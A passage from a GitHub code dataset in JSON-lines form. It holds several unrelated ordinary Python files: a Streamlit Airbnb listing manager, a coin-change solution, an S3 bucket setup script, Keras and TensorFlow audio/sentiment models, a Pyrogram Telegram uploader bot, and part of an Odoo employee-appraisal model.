index=property_type_names.index(listing[\"property_type_name\"]))\n listing_room_type_name = st.selectbox(\"Room Type\", room_type_names, index=room_type_names.index(listing[\"room_type_name\"]))\n listing_amenities = st.text_input(\"Amenities\", value=listing[\"amenities\"])\n\n # Update listing in the database if user clicks \"Save Changes\"\n if st.button(\"Save Changes\"):\n if listing_name.strip() == \"\":\n st.write(\"Listing name cannot be empty!\")\n elif listing_license.strip() == \"\":\n st.write(\"License is needed!\")\n else:\n with connection.cursor() as cursor:\n sql = \"UPDATE Listings SET name=%s, price=%s, latitude=%s, longitude=%s, minimum_nights=%s, maximum_nights=%s, description=%s, occupancy=%s, bedrooms=%s, bathrooms=%s, license=%s, has_availability=%s, neighbourhood_id=%s, property_type_name=%s, room_type_name=%s, amenities=%s WHERE listing_id=%s\"\n cursor.execute(sql, (listing_name, listing_price, listing_latitude, listing_longitude, listing_min_nights, \n listing_max_nights, listing_desc, listing_occupancy, listing_bedrooms, listing_bathrooms, \n listing_license, listing_has_availability, listing_neighbourhood_id, listing_property_type_name, listing_room_type_name, listing_amenities, listing_id))\n connection.commit()\n st.write(\"Listing updated!\")\n else:\n st.markdown(\"

You have no listings!

\", unsafe_allow_html=True)\n\ndef delete_host_listings(connection):\n # Get the host's listings from the database\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM Listings WHERE host_id = %s\"\n cursor.execute(sql, st.session_state.user_id)\n listings = cursor.fetchall()\n\n # Check if the host has any listings\n if listings:\n # Display the host's listings and allow them to select one to delete\n # st.write(\"Select a listing to delete:\")\n options = {f\"{listing['name']}\" : listing for listing in listings}\n st.markdown(\"
Your Listings
\", unsafe_allow_html=True)\n selected_option = st.selectbox(\"Select a listing to delete:\", list(options.keys()))\n\n\n # Confirm deletion before proceeding\n if st.button(\"Delete\"):\n try:\n with connection.cursor() as cursor:\n sql = \"DELETE FROM Listings WHERE listing_id = %s\"\n cursor.execute(sql, options[selected_option][\"listing_id\"])\n connection.commit()\n st.success(\"Listing deleted.\")\n except Exception as e:\n st.error(f\"Error deleting listing: {e}\")\n else:\n st.markdown(\"

You have no listings!

\", unsafe_allow_html=True)\n","repo_name":"joannjacob/Airbnb-Management-System","sub_path":"Application Code/code/host_crud.py","file_name":"host_crud.py","file_ext":"py","file_size_in_byte":13256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32852665304","text":"import sys\ninput = sys.stdin.readline\n\nn, k = map(int, input().split())\nlst = []\nfor _ in range(n):\n lst.append(int(input()))\nlst.sort(reverse=True)\ncnt = 0\n\nfor i in lst:\n cnt += k // i\n k %= i\nprint(cnt)","repo_name":"DohyunJegal/Baekjoon","sub_path":"class3/11047A.py","file_name":"11047A.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13344171982","text":"import boto3\nimport json\n\n# Replace these values with your AWS credentials and region\nregion_name = 'YOUR_REGION_NAME'\n\n# Initialize the S3 client\nsession = boto3.Session(profile_name='default')\ns3 = session.client('s3')\n\n# Name of the bucket you want to create\nbucket_name = 'bayesian-soccer-traces-matthew-burke'\n\n# Create the bucket\ntry:\n s3.create_bucket(Bucket=bucket_name, CreateBucketConfiguration={'LocationConstraint': 'us-east-2'})\nexcept:\n print('bucket alread exists')\n\n# Define the bucket policy to allow public read access\nbucket_policy = {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": \"*\",\n \"Action\": \"s3:GetObject\",\n \"Resource\": f\"arn:aws:s3:::{bucket_name}/*\"\n }\n ]\n}\n\n# Convert the bucket policy to JSON format\nbucket_policy_json = json.dumps(bucket_policy)\n\n# Apply the bucket policy\ns3.put_bucket_policy(Bucket=bucket_name, Policy=bucket_policy_json)\n\nprint(f\"Bucket '{bucket_name}' created with public read permissions.\")\n","repo_name":"MatthewBurke1995/Chalice-application","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35087404392","text":"from keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Embedding, LSTM, Bidirectional, Activation, TimeDistributed\nfrom keras.models import model_from_json\nfrom keras import metrics\nfrom keras import optimizers\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport itertools\n\nnum_nb_epoch = 2\nmaxlen = 15 # cut texts after this number of words (among top max_features most common words)\nbatch_size = 20\n\n#Credit: http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html#sphx-glr-auto-examples-model-selection-plot-confusion-matrix-py\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\ncv = pickle.load(open(\"vocab.p\", \"rb\"))\nmax_features = len(cv.vocabulary_)\nprint('The vocabulary size is {0}'.format(max_features))\n\nprint('Loading data...')\nX = np.loadtxt(\"sequence_data\")\ny = np.loadtxt(\"sequence_labels\")\nX_train, X_test, y_train, y_test = train_test_split(X, y)\nprint(len(X_train), 'train sequences')\nprint(len(X_test), 'test sequences')\n\nprint(\"Pad sequences (samples x time)\")\nX_train = sequence.pad_sequences(X_train, maxlen=maxlen)\nX_test = sequence.pad_sequences(X_test, maxlen=maxlen)\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\n\nmodel = Sequential()\nmodel.add(Embedding(max_features, 256, input_length=maxlen))\nmodel.add(Bidirectional(LSTM(128, return_sequences=True)))\nmodel.add(Bidirectional(LSTM(64)))\nmodel.add(Dropout(0.9))\nmodel.add(Dense(32))\nmodel.add(Dense(16))\nmodel.add(Dropout(0.6)) # try different dropout rates- 0.5\nmodel.add(Dense(8))\nmodel.add(Dense(3, activation='softmax'))\n\n# Use either adam, Nadam, Adagrad,or RMSprop as optimizer.\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\nprint('Train...')\nmodel.fit(X_train, y_train,\n batch_size=batch_size,\n nb_epoch=num_nb_epoch,\n validation_data=[X_test, y_test])\n\nprint('Saving the model to \\\"model.json\\\"')\n\n#Save the model to json file\nmodel_json = model.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n#serialize weights to HDF5\nprint('Saving the weights to model.h5')\nmodel.save_weights(\"model.h5\")\n\nprint('Creating Confusion Matrix Based on Test Data...')\ny_pred = model.predict(x=X_test, verbose=1)\ny_pred_new = np.empty(len(y_pred))\ny_test_new = np.empty(len(y_test))\nclass_names = ('Positive', 'Neutral', 'Negative')\n\nfor row_num in range(0, len(y_pred)):\n y_pred_new[row_num] = np.argmax(y_pred[row_num])\n y_test_new[row_num] = np.argmax(y_test[row_num])\n\n# Compute confusion matrix\ncnf_matrix = confusion_matrix(y_true=y_test_new, y_pred=y_pred_new)\nnp.set_printoptions(precision=2)\n\n# Plot normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\n title='Normalized confusion matrix')\n\nplt.figure()\nclass_totals = np.sum(y, axis=0) / len(y)\ny_pos = np.arange(len(class_names))\n\nplt.bar(y_pos, class_totals, align='center', alpha=0.5)\nplt.xticks(y_pos, class_names)\nplt.ylabel('Frequency')\nplt.title('Frequency of Sentiments in Data Set')\n\nplt.show()\n","repo_name":"ehelenowski/BlackBoxNLPMimicking","sub_path":"new_model.py","file_name":"new_model.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20845452185","text":"import copy\nimport math\nimport json\nimport resampy\n\nimport numpy as np\nimport tensorflow as tf\nfrom scipy.io import wavfile\n\nfrom python_speech_features import mfcc\n\n\nclass A2E(object):\n def __init__(self, path_model_ds=\"model/deepspeech.pb\", path_model_a2e=\"model/a2e.pb\", path_3dmm_info=\"data/facecap\"):\n self.path_model_ds = path_model_ds\n self.path_model_a2e = path_model_a2e\n self.path_3dmm_info = path_3dmm_info\n\n self.audio_handler = AudioHandler(path_model_ds)\n\n def build_model(self):\n self.audio_handler.build_model()\n\n with tf.io.gfile.GFile(\"model/a2e.pb\", \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n tf.import_graph_def(graph_def, name=\"a2e\")\n\n # build session\n self.graph = tf.get_default_graph()\n config = tf.ConfigProto(log_device_placement=False)\n config.gpu_options.allow_growth = True\n\n self.sess = tf.Session(graph=self.graph, config=config)\n\n self.input_a2e = self.graph.get_tensor_by_name('a2e/audio:0')\n self.output_a2e = self.graph.get_tensor_by_name('a2e/output:0')\n\n def smooth(self, audio, window_len=3, window='hanning'):\n s = np.r_[audio[window_len-1:0:-1], audio, audio[-2:-window_len-1:-1]]\n\n if window == 'flat': # moving average\n w = np.ones(window_len, 'd')\n else:\n w = eval('np.'+window+'(window_len)')\n\n audio_smooth = np.convolve(w/w.sum(), s, mode='valid')\n edge = window_len // 2\n return audio_smooth[edge:-(edge)]\n\n def get_expression_from_audio(self, path_audio, smooth=0):\n input_audio = self.audio_handler.process_audio(path_audio)\n output = self.sess.run(self.output_a2e, feed_dict={\n self.input_a2e: input_audio})[0]\n output[output < 0] = 0\n\n if smooth > 0:\n for i in range(51):\n output[:, i] = self.smooth(output[:, i], window_len=smooth)\n\n output = output.tolist()\n\n return output\n\n\nclass AudioHandler(object):\n def __init__(self, path_model=\"model/deepspeech.pb\", n_mfcc=26, n_context=9, fps=30, win_size=16, win_stride=1):\n self.path_model = path_model\n self.n_mfcc = n_mfcc\n self.n_context = n_context\n self.fps = fps\n self.win_size = win_size\n self.win_stride = win_stride\n\n def build_model(self):\n with tf.io.gfile.GFile(self.path_model, \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n tf.import_graph_def(graph_def, name=\"deepspeech\")\n\n # build session\n self.graph = tf.get_default_graph()\n config = tf.ConfigProto(log_device_placement=False)\n config.gpu_options.allow_growth = True\n\n self.sess = tf.Session(graph=self.graph, config=config)\n\n # tensor\n self.input_ds = self.graph.get_tensor_by_name(\n 'deepspeech/input_node:0')\n self.seq_length_ds = self.graph.get_tensor_by_name(\n 'deepspeech/input_lengths:0')\n self.output_ds = self.graph.get_tensor_by_name('deepspeech/logits:0')\n\n def process_audio(self, path_audio):\n sr, audio = wavfile.read(path_audio)\n\n audio_len_s = float(audio.shape[0]) / sr\n n_frames = int(math.ceil(audio_len_s * self.fps))\n\n if audio.ndim != 1:\n audio = audio[:, 0]\n\n audio_copy = copy.deepcopy(audio)\n audio_resample = resampy.resample(audio_copy.astype(float), sr, 16000)\n\n audio_mfcc = self.convert_mfcc(audio_resample)\n audio_ds_logit = self.get_deepspeech_logit(audio_mfcc)\n\n audio_inter = self.interpolate_feature(\n audio_ds_logit, 50, self.fps, n_frames)\n return self.make_window(audio_inter, self.win_size, self.win_stride)\n\n def convert_mfcc(self, audio):\n audio_mfcc = mfcc(audio, samplerate=16000, numcep=self.n_mfcc)\n audio_mfcc = audio_mfcc[::2]\n n_strides = len(audio_mfcc)\n\n empty_context = np.zeros(\n (self.n_context, self.n_mfcc), dtype=audio_mfcc.dtype)\n audio_mfcc = np.concatenate((empty_context, audio_mfcc, empty_context))\n\n window_size = 2 * self.n_context + 1\n audio_mfcc_window = np.lib.stride_tricks.as_strided(\n audio_mfcc,\n (n_strides, window_size, self.n_mfcc),\n (audio_mfcc.strides[0], audio_mfcc.strides[0],\n audio_mfcc.strides[1]),\n writeable=False)\n\n audio_mfcc_window = np.reshape(audio_mfcc_window, [n_strides, -1])\n audio_mfcc_window = np.copy(audio_mfcc_window)\n audio_mfcc_window = (\n audio_mfcc_window - np.mean(audio_mfcc_window)) / np.std(audio_mfcc_window)\n\n return audio_mfcc_window\n\n def get_deepspeech_logit(self, audio_mfcc):\n output = self.sess.run(self.output_ds,\n feed_dict={self.input_ds: audio_mfcc[np.newaxis, ...],\n self.seq_length_ds: [audio_mfcc.shape[0]]})\n return output\n\n def interpolate_feature(self, input_features, input_rate, output_rate, n_frames):\n n_features = input_features[:, 0].shape[1]\n input_len = input_features[:, 0].shape[0]\n seq_len = input_len / float(input_rate)\n output_len = n_frames\n\n input_timestamps = np.arange(input_len) / float(input_rate)\n output_timestamps = np.arange(output_len) / float(output_rate)\n output_features = np.zeros((output_len, n_features))\n\n for feat in range(n_features):\n output_features[:, feat] = np.interp(\n output_timestamps, input_timestamps, input_features[:, 0][:, feat])\n\n return output_features\n\n def make_window(self, input_features, win_size, win_stride):\n # make_window\n zero_pad = np.zeros((int(win_size / 2), input_features.shape[1]))\n output = np.concatenate((zero_pad, input_features, zero_pad), axis=0)\n windows = []\n\n for win_index in range(0, output.shape[0] - win_size, win_stride):\n windows.append(output[win_index:win_index+win_size])\n\n return np.array(windows)\n","repo_name":"wjy5446/audio2expression","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24877027811","text":"#!/usr/bin/python3\n\"\"\"\nMake a function that prints 2 new lines after\nevery \".\", \"?\" or \":\" in text, with the rest\nof the content in that text.\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n Prints all the contents of the 'text' string,\n but printing 2 new line characters instead of\n every \".\", \"?\" or \":\".\n\n If 'text' is not a string, TypeError is raised.\n\n THE TEXT IS PRINTED WITHOUT A FINAL NEW LINE.\n \"\"\"\n if type(text) != str:\n raise TypeError(\"text must be a string\")\n\n result = text\n for punctuation in \".?:\":\n result = result.replace(punctuation, \"\\n\\n\")\n\n print(result, end=\"\")\n","repo_name":"GABETROLL/holbertonschool-higher_level_programming","sub_path":"python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29288329292","text":"#Modules\r\nimport os\r\nfrom pyrogram import Client, filters\r\nimport pyrogram\r\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, Message\r\nimport asyncio\r\nimport tgcrypto\r\nimport yt_dlp\r\nfrom yarl import URL\r\nimport pyshorteners\r\nimport qrcode\r\nfrom config import Config\r\nimport speedtest\r\n\r\nfrom config import Config\r\n\r\n#Client\r\nGigaChad = Client(\r\n \"GigaChad\",\r\n api_id = Config.API_ID,\r\n api_hash = Config.API_HASH,\r\n bot_token = Config.BOT_TOKEN\r\n)\r\n\r\n\r\n@GigaChad.on_message(filters.command(\"start\") & ~filters.edited)\r\nasync def Start(filters, message):\r\n print(f\"🤖The Bot was started by: {message.from_user.id}\\n{message.from_user.username}\\n\") #In Spanish: \"El bot ha sido comenzado por: \"\r\n await message.reply_photo(\"https://telegra.ph/file/90aa09730e63d35357221.png\")\r\n await message.reply_text(f\"🙃Usuario: {message.from_user.mention}\\n🆔ID: {message.from_user.id}\\n📛Nombre de Usuario: @{message.from_user.username}\\n\\nHola Humano, Soy un **Bot que sube archivos a Telegram, genera codigos QR y acorta enlaces**, puedo subir archivos directos desde varios sitios(Ejemplos: Uptodown.com, Malavida.com, Youtube.com, facebook.com,etc..., en proximas actualizaciones podras descargar desde MEGA, y vendran mas cosas increibles), Aqui puedes ver mas info acerca de mi creador😁👇\",\r\n reply_markup=InlineKeyboardMarkup([[\r\n InlineKeyboardButton(\"👾Github👾\", url=\"https://www.github.com/Tnoob-dev\"),\r\n InlineKeyboardButton(\"🔝Repo🔝\", url=\"https://github.com/Tnoob-dev/GigaChad-bot\"),\r\n InlineKeyboardButton(\"🐦Twitter🐦\", url=\"https://twitter.com/TitiLM30\")\r\n ],\r\n [InlineKeyboardButton(\"⌨️Canal interesante⌨️\", url=\"https://t.me/s3softwareyprogramacion\"),\r\n\r\n InlineKeyboardButton(\"💻Grupo adjunto💻\", url=\"https://t.me/S3SPGrupo\")\r\n ],\r\n [InlineKeyboardButton(\"🇬🇧Text in English🇬🇧\", callback_data='ingles_start')]\r\n ]))\r\n await message.reply_text(\"**🇬🇧Note: Send /help to know what i can do\\n\\n🇪🇸Nota: Envia /help para conocer que puedo hacer**\")\r\n\r\n@GigaChad.on_callback_query(filters.regex('ingles_start'))\r\nasync def start_query(client, callback_query):\r\n await callback_query.answer()\r\n await callback_query.message.edit_text(\"Hi Human, I'm a **Uploader to Telegram bot, i can generate QR Codes too, and short URLs**, i can upload files from some sites(Example: Uptodown.com, Malavida.com, Youtube.com, facebook.com,etc..., in other actualizations will come MEGA, and other amazing things), Here you can see more info about my Creator😁👇\",\r\n \r\n reply_markup=InlineKeyboardMarkup([[\r\n InlineKeyboardButton(\"👾Github👾\", url=\"https://www.github.com/Tnoob-dev\"),\r\n InlineKeyboardButton(\"🔝Repo🔝\", url=\"https://github.com/Tnoob-dev/GigaChad-bot\"),\r\n InlineKeyboardButton(\"🐦Twitter🐦\", url=\"https://twitter.com/TitiLM30\")\r\n ],\r\n [InlineKeyboardButton(\"⌨️Interesting Channel⌨️\", url=\"https://t.me/s3softwareyprogramacion\"),\r\n\r\n InlineKeyboardButton(\"💻attached group💻\", url=\"https://t.me/S3SPGrupo\")\r\n ]]))\r\n\r\n\r\n\r\n@GigaChad.on_message(filters.command(\"help\") & ~filters.edited)\r\nasync def ayuda(filters, message):\r\n await message.reply_photo(\"https://telegra.ph/file/86a8426af71ef4f7eeec8.png\")\r\n await message.reply_text(\"Envia /download y luego el link de descarga, lo descargare y luego te enviare el archivo\\n\\nEnvia /qr y luego un texto, y te generare un codigo QR con el texto dentro\\n\\nEnvia /short y luego un link y te enviare un link acortado con el link que enviaste\\n\\nEnvia /speedtest para hacer un pequeño Test de rapidez y ver la velocidad de Bajada/subida\\n\\n**Nota**: Si envias un enlace y el bot no lo reconoce, puedes enviar el enlace a @DirectLinkGeneratorbot, @DirectLinkGen_bot o @MaxFile2LinkBot.\", \r\n \r\n reply_markup= InlineKeyboardMarkup([[\r\n\r\n InlineKeyboardButton(\"🇬🇧Text in English🇬🇧\", callback_data='ingles_help'),\r\n ]]\r\n )\r\n )\r\n\r\n@GigaChad.on_callback_query(filters.regex('ingles_help'))\r\nasync def help_query(client, callback_query):\r\n await callback_query.answer()\r\n await callback_query.message.edit_text(\"Send /download and later send me the link, i will Download it and send you the file\\n\\nSend /qr and later a text and i will generate you a QR Code with the text\\n\\nSend /short and later send a link and i will short it\\n\\nSend /speedtest to do a quickly speedtest and watch the speed of Download/Upload\\n\\nNote: If you want to upload some other things and the bot don't recongnize him, you can go to @DirectLinkGeneratorbot, @DirectLinkGen_bot or @MaxFile2LinkBot.\")\r\n\r\n\r\n@GigaChad.on_callback_query(filters.regex('close'))\r\nasync def help_query(client, callback_query):\r\n await callback_query.answer()\r\n await callback_query.message.delete()\r\n\r\n\r\nConversation_state = {} \r\n\r\n\r\n@GigaChad.on_message() #the filters and that stuffs\r\nasync def msg_handler(client, message: Message):\r\n dwnlad = message.text #message sended by the User\r\n pal = f\"✅✅Upload Success✅✅\\nUploaded By @Uploader_Tbot\\nRemember GigaChad Loves u😘\\nThe file was requested by: {message.from_user.id}\" #The text who will be at the side of the archive when this is uploaded\r\n pal_qr = f\"✅✅QR Generated✅✅\\nUploaded By @Uploader_Tbot\\nRemember GigaChad Loves u😘\\nThe QR was requested by: {message.from_user.id}\"\r\n who = message.from_user.id\r\n state = Conversation_state.get(who)\r\n chatid = message.chat.id\r\n \r\n DOWNLOAD_LINK = 0\r\n\r\n if state is None and message.text == \"/download\":\r\n await message.reply_text(\"🙃Give me a link to download🙃\")\r\n Conversation_state[who] = DOWNLOAD_LINK\r\n \r\n return\r\n\r\n if state == DOWNLOAD_LINK and URL(dwnlad).scheme and URL(dwnlad).host :\r\n del Conversation_state[who]\r\n \r\n m = await message.reply_text(\"⬇️**Downloading the file**⬇️\")\r\n try:\r\n loop = asyncio.get_running_loop()\r\n\r\n ytdownload = yt_dlp.YoutubeDL({\"logger\": YT_DLP_LOGGER()})\r\n fdata = await loop.run_in_executor(None, ytdownload.extract_info, dwnlad)\r\n fname = ytdownload.prepare_filename(fdata)\r\n await asyncio.sleep(2)\r\n await GigaChad.send_chat_action(chat_id = chatid,action=\"upload_document\")\r\n await m.edit(\"**⬆️Uploading the archive⬆️**\")\r\n await asyncio.sleep(5)\r\n await m.delete()\r\n await message.reply_document(fname, caption=pal)\r\n except Exception:\r\n await m.edit(\"❌Not a link supported❌\")\r\n\r\n return\r\n\r\n QR = 1\r\n if state is None and message.text == \"/qr\":\r\n await message.reply_text(\"✍️Send me the text to generate QR✍️\")\r\n Conversation_state[who] = QR\r\n\r\n if state == QR and dwnlad:\r\n del Conversation_state[who]\r\n filename = \"qr\" + \".png\"\r\n\r\n img = qrcode.make(dwnlad)\r\n img.save(filename)\r\n\r\n await GigaChad.send_chat_action(chat_id=chatid, action=\"upload_photo\")\r\n await message.reply_photo(filename, caption=pal_qr)\r\n\r\n os.remove(filename)\r\n return\r\n\r\n SHORT = 2\r\n if state is None and message.text == \"/short\":\r\n await message.reply_text(\"✍️Send me a link to short it✍️\")\r\n Conversation_state[who] = SHORT\r\n\r\n if state == SHORT and dwnlad:\r\n del Conversation_state[who]\r\n \r\n s = pyshorteners.Shortener()\r\n\r\n short_clckru = s.clckru.short(dwnlad)\r\n short_dagd = s.dagd.short(dwnlad)\r\n short_osdb = s.osdb.short(dwnlad)\r\n\r\n await GigaChad.send_chat_action(chat_id=chatid, action=\"typing\")\r\n await message.reply_text(\"✅✅Here you have your link shorted:\\n\\n😆From Clck.ru: \\n\\n\" + short_clckru + \"\\n\\n🙃From Da.gd: \\n\\n\" + short_dagd + \"\\n\\n😁From Os.db: \\n\\n\" + short_osdb + \"\\n\\n\\nThanks for use @Uploader_Tbot😊\", disable_web_page_preview=True)\r\n\r\n return\r\n test = speedtest.Speedtest()\r\n if message.text == \"/speedtest\":\r\n a = await message.reply_text(\"**Generating speedTest...please wait this can take a moment**\")\r\n \r\n up_res = test.upload()\r\n down_res = test.download()\r\n ping_res = test.results.ping\r\n await a.edit(f\"```Subida: {up_res / 1024 / 1024 / 8:.2f} Mb/s\\nBajada: {down_res / 1024 / 1024 / 8:.2f} Mb/s\\nPing: {ping_res} ms```\\n\\n__Bot Hosted in:__ **Heroku❤️**\")\r\n return\r\n\r\n#Start the bot :)\r\nprint(\"Bot running\")\r\n\r\nif __name__ == '__main__':\r\n GigaChad.run()\r\n","repo_name":"ibany2711/GigaChad-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21944825521","text":"from datetime import datetime, timedelta\r\nimport time\r\nimport base64\r\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\r\nfrom odoo import models, fields, api, _, SUPERUSER_ID\r\nfrom odoo.exceptions import ValidationError\r\nfrom odoo import http\r\nimport logging\r\nfrom lxml import etree\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\n\r\nclass HrEmployeeAppraisal(models.Model):\r\n _name = \"usl.employee.appraisal\"\r\n _description= \"Employee Appraisal\"\r\n _order = \"id desc\"\r\n _inherit = ['mail.thread']\r\n\r\n name = fields.Char(string=\"Description\", readonly=True)\r\n sequence = fields.Char(string=\"# ID\", readonly=True)\r\n appraisal_config_id = fields.Many2one('usl.appraisal.config', \r\n string=\"Appraisal Config ID\", required=True, readonly=True)\r\n template_id = fields.Many2one('usl.appraisal.template', string=\"Template\")\r\n employee_id = fields.Many2one('hr.employee', string=\"Employee\", required=False, readonly=True)\r\n line_manager_id = fields.Many2one('hr.employee', string=\"Line Manager\")\r\n approver_ids = fields.Many2many('hr.employee', string=\"Approvers\",readonly=True)\r\n department_id = fields.Many2one('hr.department', string=\"Department\",readonly=True)\r\n unit_id = fields.Char(string=\"Unit\", readonly=True)\r\n directed_user_id = fields.Many2one('res.users', string=\"Appraisal with ?\", readonly=True)\r\n job_title = fields.Many2one('hr.job', string=\"Job title\", readonly=True)\r\n date_from = fields.Date(string=\"Date From\", readonly=True, store=True)\r\n date_end = fields.Date(string=\"Date End\", readonly=True)\r\n deadline = fields.Date(string=\"Deadline Date\", compute=\"get_appraisal_deadline\", store=True)\r\n key_strength = fields.Text(string=\"Key Strengths to Continue\")\r\n key_development = fields.Text(string=\"Key Development Opportunites\")\r\n training_needs = fields.Text(string=\"Appraisee's training needs\")\r\n first_level_summary = fields.Text(string=\"First Level Summary of assessment\")\r\n second_level_summary = fields.Text(string=\"Second Level Summary of assessment\")\r\n kpr_assessment_comment = fields.Text(string=\"KPR Assessment Comment\")\r\n appraisee_comment = fields.Text(string=\"Appraisee's Comment\")\r\n confirm_submission = fields.Boolean(string=\"Confirm Submission\", default=False)\r\n kpi_assessment_lines = fields.Many2many(\r\n 'usl.kpi.assessment', \r\n 'usl_employee_appraisal_rel_1', \r\n 'kpi_attitude_assessment_1_id', \r\n string=\"KPI Questions\"\r\n )\r\n kpi_attitude_assessment_lines = fields.Many2many(\r\n 'usl.kpi.assessment', \r\n 'usl_employee_appraisal_rel', \r\n 'kpi_attitude_assessment_id', \r\n string=\"Attitude KPI Questions\"\r\n )\r\n balance_score = fields.Float(\r\n string=\"Balance Score\", \r\n compute=\"_compute_assessment_score\", \r\n help=\"Sum of balance score Total percentage in line\",\r\n store=True\r\n )\r\n attitude_appraisal_score = fields.Float(\r\n string=\"Attitude Appraisal Score\",\r\n compute=\"_compute_assessment_score\", \r\n help=\"Sum of attitude appraisal Total percentage in line\"\r\n )\r\n overall_total = fields.Float(\r\n string=\"Overall Total\", \r\n compute=\"_compute_overall_total\",\r\n store=True\r\n\r\n )\r\n days_remaining = fields.Integer(\r\n string=\"Days remaining\", \r\n compute=\"_compute_days_remaining\"\r\n )\r\n total_score = fields.Float(\r\n string=\"Total Score\", \r\n help=\"This is the overall total - the number of queries * 5 and number of warnings * 3\"\r\n )\r\n state = fields.Selection([\r\n ('Draft', 'Draft'),\r\n ('In progress', 'In progress'),\r\n ('Done', 'Done'),\r\n ('Locked', 'Locked'),\r\n ('Cancel', 'Cancel'),\r\n ], string=\"Status\", readonly=True)\r\n\r\n acceptance_status = fields.Selection([\r\n ('Accepted', 'Accepted'),\r\n ('Rejected', 'Rejected'),\r\n ], string=\"Acceptance Status\", readonly=True)\r\n \r\n result = fields.Selection([\r\n ('None', 'None'),\r\n ('A+', 'EXCEPTIONAL PERFORMANCE'),\r\n ('A', 'EXCEEDS EXPECTATION'),\r\n ('B', 'MEETS EXPECTATION'),\r\n ('C', 'ABOVE AVERAGE'),\r\n ('D', 'NEEDS IMPROVEMENT'),\r\n ('E', 'UNACCEPTABLE POOR PERFORMANCE'),\r\n ], string=\"Result\", default=\"None\", readonly=True)\r\n result_description = fields.Char(string=\"Performance description\", readonly=False)\r\n performance_band = fields.Char(string=\"Performance Band\", readonly=True)\r\n ho_comment = fields.Text(string=\"HOU's / HOD's Comment\")\r\n comments = fields.Text(string=\"General Comments\")\r\n commendation = fields.Boolean(string=\"Satisfactory\", default=False)\r\n queried = fields.Boolean(string=\"Queried\", default=False)\r\n warned = fields.Boolean(string=\"Warning to Improve\", default=False)\r\n dismissal = fields.Boolean(string=\"Dismissal\", default=False)\r\n confirm = fields.Boolean(string=\"Confirm\", default=False)\r\n absent = fields.Integer(string=\"Total Absent\", default=0)\r\n edit_mode = fields.Boolean(string=\"Edit mode\", default=False)\r\n appraisal_with_hr_manager = fields.Boolean(\r\n string=\"With HR manager\", \r\n default=False, store=True, \r\n compute=\"compute_appraisal_with_manager\")\r\n appraisal_with_hr_supervisor = fields.Boolean(\r\n string=\"With Supervisor\", default=False, \r\n store=True, compute=\"compute_appraisal_with_manager\"\r\n )\r\n extend_probation = fields.Boolean(string=\"Extend probation\", default=False)\r\n need_improvement = fields.Boolean(string=\"Needs Attitude Improvement\", default=False)\r\n number_queries = fields.Integer(string=\"Queries\")\r\n number_commendation = fields.Integer(string=\"Commendation\")\r\n number_warning = fields.Integer(string=\"Warning\")\r\n number_absent = fields.Integer(string=\"Absent\")\r\n number_appraisal = fields.Integer(string=\"Appraisal\")\r\n appraisal_year = fields.Char(\r\n string=\"Appraisal year\", \r\n compute=\"compute_appraisal_year\",\r\n store=True) \r\n\r\n @api.depends('date_from')\r\n def compute_appraisal_year(self):\r\n for rec in self:\r\n if rec.date_from:\r\n rec.appraisal_year = datetime.strptime(rec.date_from.strftime('%Y-%m-%d'), '%Y-%m-%d').year\r\n else:\r\n rec.appraisal_year = False \r\n\r\n @api.depends('directed_user_id')\r\n def compute_appraisal_with_manager(self):\r\n if self.directed_user_id:\r\n current_user = 